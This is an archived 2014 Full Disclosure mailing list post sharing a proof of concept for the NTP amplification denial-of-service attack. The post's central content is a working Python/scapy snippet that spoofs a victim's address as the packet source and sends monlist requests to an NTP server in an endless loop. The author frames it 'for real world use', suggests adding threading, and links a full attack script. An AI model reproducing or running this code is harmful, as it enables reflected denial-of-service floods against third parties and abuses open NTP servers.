[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] A more robust POC for the ntp amplification dos

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] A more robust POC for the ntp amplification dos
From: rai@xxxxxxxxxxxxxxx
Date: Wed, 16 Jul 2014 09:20:00 +0000

Hi,

Even though, the ntp amplification attacks are old, and there are
plenty of scripts for checking if vulnerable (eg. the nmap nse script
ntp-mon), I had trouble finding a good example script that actually
exploited the vuln as would be done in the wild.

Eventually I edited a partially written script written by multiple
authors. Since it is in python, and uses scapy the key part exploit is
as simple as:

data = "\x17\x00\x03\x2a" + "\x00" * 4
...

packet =IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data)

send(packet,loop=1)

For real world use, just add some boilerplate threading to taste:

http://maker.fea.st/ntpamp.py

--
rai

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] SEC Consult SA-20140716-0 :: Multiple SSRF vulnerabilities in Alfresco Community Edition
Next by Date: Re: [FD] Is the era of ezine txt files over?
Previous by thread: [FD] SEC Consult SA-20140716-0 :: Multiple SSRF vulnerabilities in Alfresco Community Edition
Next by thread: [FD] Jamming WiFi tracking beacons
Index(es):
- Date
- Thread